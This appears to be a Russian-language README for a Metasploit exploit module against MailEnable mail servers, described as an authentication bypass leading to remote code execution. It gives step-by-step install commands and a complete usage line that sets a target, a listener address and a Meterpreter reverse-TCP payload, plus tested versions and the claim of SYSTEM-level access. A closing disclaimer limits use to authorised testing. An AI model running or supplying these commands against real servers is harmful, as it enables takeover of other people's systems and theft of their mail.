
Модуль Metasploit для MailEnable: обход аутентификации и удалённое выполнение кода (CVE-2022-36934)
Модуль Metasploit для уязвимости обхода аутентификации в MailEnable (CVE-2022-36934), приводящей к удалённому выполнению кода.
cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
reload_all
use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit
🎯 Протестировано на:
MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016
📝 Технические подробности:
Уязвимость: обход аутентификации через SQL-подобный синтаксис в SMTP/POP3
Вектор атаки: сеть (порты 25/110)
Привилегии: выполнение от имени сервисной учётной записи MailEnable (часто SYSTEM)
⚠️ Правовое предупреждение:
Этот инструмент предназначен только для авторизованного тестирования. Никогда не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.